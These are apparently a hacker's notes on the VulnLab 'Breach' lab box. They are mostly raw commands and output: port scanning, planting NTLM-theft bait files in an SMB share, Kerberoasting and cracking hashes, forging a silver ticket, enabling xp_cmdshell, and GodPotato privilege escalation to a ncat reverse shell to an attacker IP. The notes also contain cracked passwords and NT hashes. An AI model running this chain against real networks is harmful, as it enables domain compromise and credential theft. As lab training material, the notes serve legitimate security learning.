Here is my notes on BREACH box from VulnLab.
BREACH: 10.10.94.173
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
-No Robots.txt
-No Admin Page.
-No Dashboard Page.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-02 17:02:50Z)
-No Asreproasting.
┌──(root㉿kali)-[/home/…/COMP/BREACH/10.10.94.173/share]
└─# sudo impacket-GetUserSPNs 'breach.vl/Julia.Wong:Computer1' -dc-ip 10.10.94.173 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------------- --------- -------- -------------------------- -------------------------- ----------
MSSQLSvc/breachdc.breach.vl:1433 svc_mssql 2022-02-17 05:43:08.106169 2024-02-02 12:02:55.474231
┌──(root㉿kali)-[/home/…/COMP/BREACH/10.10.94.173/share]
└─# sudo rdate -n 10.10.94.173
Fri Feb 2 13:26:04 EST 2024
┌──(root㉿kali)-[/home/…/COMP/BREACH/10.10.94.173/share]
└─# sudo impacket-GetUserSPNs 'breach.vl/Julia.Wong:Computer1' -dc-ip 10.10.94.173 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------------- --------- -------- -------------------------- -------------------------- ----------
MSSQLSvc/breachdc.breach.vl:1433 svc_mssql 2022-02-17 05:43:08.106169 2024-02-02 12:02:55.474231
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$6ca3d5457f064e1bbae73f3c88465cbc$67e53b499a579010a4625aeae39ef5097d73a0c893e61739c826fad473e1f69352e8b5f0e3a859cbff3706ef5b606ad53af1415856c463c358c127b5a02c11066fe5c7979c14de801b08faa21aaec1cb7b95ee99f998ac51c4b1b9abb0366b18dfb4efe888b722e879ae4c7a3e0da32525b2c366289b2f9b853eb6009a01cdace0ca9700cd501911be00f43836f009ad48839b8230cefdf09553be0e4b360244be57433eb6ed030cba1449ff1180aa509868a76a6b8f6fce6bfa01a7316146c6b642e7cb2639b74626f52a0c48da99237fa373059a586355ddd2e2681588c625212a79179db43565e7edbb2558f8b1c994a4b4f14b212d85b03ddda739d48e1eefcb7ac2e37e0807c735df37005069f0cbbb0167edbccde0992c4d39e6309f380b6cf75012ec48a15db44aaa03e3efffb4707682122497f5569b2241e06e00eede33095382dfef0979852e71abc2ed92a8194f0f272f633bd098dd297f2187512cd9c38d295d67b5021b9df85d49fb3ae2995d53260e67708c86be9ac62e623952b913e6b39dd5a80a92b6ddf7cb53548f6dd019b19dce2b1d52c109ac04c68dac37df6e284ef32ec3feecdf5f8afb34d0b29ca35ffe97ecd7013ecdd39a0e7cf2f9c74dc136f2b95138bb492fed1ec264deccd823d2bbff292566b6b2a7d13496c4a5cd91a3efd91dd4e9d7a77c01934ecd0e77f2b3df2258c488f6ae211cb40e5ec7b40656fb7ed11e0e2e0d415033e1fbcfde8df9450da3449f6c36e5f502ad07210f7632f204e1feaf5255af929977966cb34966a69c214a2e79162daebcd2f5af376d694ecfe17957be800d45d857752822524c1398e052e3c7bd75ddd203ccee6af25580797e3c2045094987125052ab1b482729fabceb2f0fe309544ffa631a6d014780c96e9dcd4a8a84232148156150cd908c97c22353b9d726062b3771dccdd6602b245fb8ba11c5047616094151ff1afc2a67f2952e0c07ea15f6617d4419c2b1d689338ce7c42a025b2562215d17fc073d684503c3cfb13f391ec9a072507db0182c6b8838e0719e895732f9c80311a4eaad883304c143005fbf062d1e2da0b637796a46c537c7b4508d887b641738184e6a0377d6d1807a44e42c1a35ae7ce56091ac0390555a40f27b0e09c2c83dcc65b2a204b35117b98ff384a0f075fbda187834fd1998ad22963bf8a3968e34bbc466be13ebfa8a013fd5d26b41d684e9d0b8a5edf7caf7ee97b2efcb132b223fbcf1905371082c3cceaaa37cdbd2f15123f7a176cffba4421de3d38009602b370d63e62e48500aea5f5d9e1d8ddf464c06944cea33cdb1991258db04d133054b23fb96da582780ac3e14d275f09f04313b1376d890de8ecae3f472442507665306eb3dd9c433d38c154c56df3beb693f5f3dd68d4f99609afb467ea575bedcef754a4734f6452e99c693b1be50594ee51381b88b3328b94d5e9996582bf5
┌──(root㉿kali)-[/home/…/COMP/BREACH/10.10.94.173/share]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Trustno1 (?)
1g 0:00:00:00 DONE (2024-02-02 14:26) 4.761g/s 248685p/s 248685c/s 248685C/s chloelouise..lili12
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
svc_mssql:Trustno1
135/tcp open msrpc Microsoft Windows RPC
-No Printnightmare.
┌──(root㉿kali)-[/home/…/BOXES/COMP/BREACH/10.10.94.173]
└─# rpcclient --user="" --command=enumdomusers -N 10.10.94.173
result was NT_STATUS_ACCESS_DENIED
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/…/BOXES/COMP/BREACH/10.10.94.173]
└─# crackmapexec smb 10.10.94.173 -u guest -p "" --shares
SMB 10.10.94.173 445 BREACHDC [*] Windows 10.0 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB 10.10.94.173 445 BREACHDC [+] breach.vl\guest:
SMB 10.10.94.173 445 BREACHDC [+] Enumerated shares
SMB 10.10.94.173 445 BREACHDC Share Permissions Remark
SMB 10.10.94.173 445 BREACHDC ----- ----------- ------
SMB 10.10.94.173 445 BREACHDC ADMIN$ Remote Admin
SMB 10.10.94.173 445 BREACHDC C$ Default share
SMB 10.10.94.173 445 BREACHDC IPC$ READ Remote IPC
SMB 10.10.94.173 445 BREACHDC NETLOGON Logon server share
SMB 10.10.94.173 445 BREACHDC share READ,WRITE #Interesting ?
SMB 10.10.94.173 445 BREACHDC SYSVOL Logon server share
SMB 10.10.94.173 445 BREACHDC Users READ #WEIRD ?
smb: \transfer\> cd ..
smb: \> dir
. D 0 Fri Feb 2 12:13:22 2024
.. DHS 0 Thu Feb 17 10:38:00 2022
finance D 0 Thu Feb 17 06:19:34 2022 #Writable
software D 0 Thu Feb 17 06:19:12 2022 #Writable
transfer D 0 Thu Feb 17 09:00:35 2022 #NOPE
┌──(root㉿kali)-[/home/kali/Kali-Tools/ntlm_theft/important]
└─# smbclient \\\\10.10.94.173\\share -U "guest"
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Feb 2 12:13:22 2024
.. DHS 0 Thu Feb 17 10:38:00 2022
finance D 0 Fri Feb 2 12:29:05 2024
software D 0 Fri Feb 2 12:32:30 2024
transfer D 0 Thu Feb 17 09:00:35 2022
cd
7863807 blocks of size 4096. 2849053 blocks available
smb: \> cd transfer
smb: \transfer\> ls
. D 0 Thu Feb 17 09:00:35 2022
.. D 0 Fri Feb 2 12:13:22 2024
claire.pope D 0 Thu Feb 17 06:21:35 2022
diana.pope D 0 Thu Feb 17 06:21:19 2022
julia.wong D 0 Thu Feb 17 06:24:39 2022
7863807 blocks of size 4096. 2849053 blocks available
smb: \transfer\> put important.pdf
putting file important.pdf as \transfer\important.pdf (2.1 kb/s) (average 2.1 kb/s)
smb: \transfer\> put important.scf
putting file important.scf as \transfer\important.scf (0.2 kb/s) (average 1.1 kb/s)
smb: \transfer\> put important.url
important.url does not exist
smb: \transfer\> put important.rtf
\putting file important.rtf as \transfer\important.rtf (0.3 kb/s) (average 0.9 kb/s)
smb: \transfer\> put important.lnk
putting file important.lnk as \transfer\important.lnk (5.3 kb/s) (average 2.1 kb/s)
smb: \transfer\>
#Use NTLM_THEFT to get hash with Responder.
#Julia.Wong hooked.
┌──(root㉿kali)-[/home/…/COMP/BREACH/10.10.94.173/share]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Computer1 (Julia.Wong)
1g 0:00:00:00 DONE (2024-02-02 14:20) 3.125g/s 377600p/s 377600c/s 377600C/s bratz1234..042602
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
#Upload it to all writable folders for just in case. #BREACH
smb: \Public\Documents\> put test.txt
putting file test.txt as \Public\Documents\test.txt (0.0 kb/s) (average 0.0 kb/s)
\Public folder in Users share can be writable.
smb: \Public\> cd Libraries │
dsmb: \Public\Libraries\> doir │
doir: command not found │
smb: \Public\Libraries\> dir │
. DHR 0 Sat May 8 04:34:49 2021 │
.. DR 0 Tue Sep 14 23:08:59 2021 │
desktop.ini AHS 175 Sat May 8 04:18:31 2021 │
RecordedTV.library-ms A 999 Sat May 8 04:18:31 2021 │
│
7863807 blocks of size 4096. 2851817 blocks available │
smb: \Public\Libraries\>
sudo impacket-lookupsid Guest@10.10.94.173 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
-LDAP V3 = NOPE.
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2024-02-02T17:09:13+00:00; -59m44s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-02-02T17:03:30
|_Not valid after: 2054-02-02T17:03:30
┌──(root㉿kali)-[/home/…/COMP/BREACH/10.10.94.173/share]
└─# impacket-mssqlclient svc_mssql:Trustno1@10.10.94.173 -windows-auth
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\svc_mssql guest@master)> enable_xp_cmdshell
ERROR: Line 1: You do not have permission to run the RECONFIGURE statement.
-NO HASH STEALING.
Silver Ticket:
Service Account Password - Can convert to hash - CHECK ! Trustno1:69596C7AA1E8DAEE17F8E78870E25A5C
SPN - MSSQLSvc/breachdc.breach.vl:1433
[*] Domain SID is: S-1-5-21-2330692793-3312915120-706255856
impacket-ticketer -nthash 69596C7AA1E8DAEE17F8E78870E25A5C -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -spn MSSQLSvc/breachdc.breach.vl:1433 -user-id 500 Administrator
impacket-ticketer -nthash 69596C7AA1E8DAEE17F8E78870E25A5C -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip 10.10.94.173 -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
┌──(root㉿kali)-[/home/…/BOXES/COMP/BREACH/10.10.94.173]
└─# impacket-ticketer -nthash 69596C7AA1E8DAEE17F8E78870E25A5C -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -spn MSSQLSvc/breachdc.breach.vl:1433 -user-id 500 Administrator
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
┌──(root㉿kali)-[/home/…/BOXES/COMP/BREACH/10.10.94.173]
└─# pwd
/home/kali/BOXES/COMP/BREACH/10.10.94.173
┌──(root㉿kali)-[/home/…/BOXES/COMP/BREACH/10.10.94.173]
└─# export KRB5CCNAME=/home/kali/BOXES/COMP/BREACH/10.10.94.173/Administrator.ccache
┌──(root㉿kali)-[/home/…/BOXES/COMP/BREACH/10.10.94.173]
└─# klist
Ticket cache: FILE:/home/kali/BOXES/COMP/BREACH/10.10.94.173/Administrator.ccache
Default principal: Administrator@BREACH.VL
Valid starting Expires Service principal
02/02/2024 15:01:36 01/30/2034 15:01:36 MSSQLSvc/breachdc.breach.vl:1433@BREACH.VL
renew until 01/30/2034 15:01:36
breachdc.breach.vl
┌──(root㉿kali)-[/home/kali/BOXES/COMP/BREACH]
└─# impacket-mssqlclient -k breachdc.breach.vl
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\Administrator dbo@master)> enable_xp_cmdshell
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)> xp_cmdshell whoami
output
----------------
breach\svc_mssql
NULL
SQL (BREACH\Administrator dbo@master)>
/etc/hosts:
10.10.67.63 breach.vl BREACH.VL breachdc.breach.vl BREACHDC.BREACH.VL
#Convert it to gain a USER SHELL ! -svc_mssql
PRIV ESC:
SeImpersonatePrivilege - PRIVILEGE ESCALATION.
GodPotato - WORKS !
GODPOTATO.exe -cmd "cmd /c whoami"
GODPOTATO.exe -cmd "cmd /c C:\Users\svc_mssql\ncat.exe -nv 10.8.0.71 3333 -e CMD"
SYSTEM SHELL !
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is B465-02B6
Directory of C:\Users\Administrator\Desktop
02/17/2022 10:51 AM <DIR> .
02/17/2022 09:35 AM <DIR> ..
02/17/2022 10:52 AM 36 root.txt
1 File(s) 36 bytes
2 Dir(s) 10,590,625,792 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
[REDIRECTED]
C:\Users\Administrator\Desktop>
ROOT.TXT: [REDIRECTED]
C:\share\transfer\julia.wong>dir
dir
Volume in drive C has no label.
Volume Serial Number is B465-02B6
Directory of C:\share\transfer\julia.wong
02/17/2022 11:24 AM <DIR> .
02/17/2022 02:00 PM <DIR> ..
02/17/2022 11:25 AM 36 local.txt
1 File(s) 36 bytes
2 Dir(s) 10,590,130,176 bytes free
C:\share\transfer\julia.wong>type local.txt
type local.txt
[REDIRECTED]
C:\share\transfer\julia.wong>
LOCAL.TXT: [REDIRECTED]
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-02-02T17:03:40+00:00; -59m44s from scanner time.
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Not valid before: 2024-02-01T17:02:17
|_Not valid after: 2024-08-02T17:02:17
| rdp-ntlm-info:
| Target_Name: BREACH
| NetBIOS_Domain_Name: BREACH
| NetBIOS_Computer_Name: BREACHDC
| DNS_Domain_Name: breach.vl
| DNS_Computer_Name: BREACHDC.breach.vl
| DNS_Tree_Name: breach.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-02-02T17:03:00+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
64073/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
64295/tcp open msrpc Microsoft Windows RPC
64307/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -59m44s, deviation: 0s, median: -59m44s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-02-02T17:03:04
|_ start_date: N/A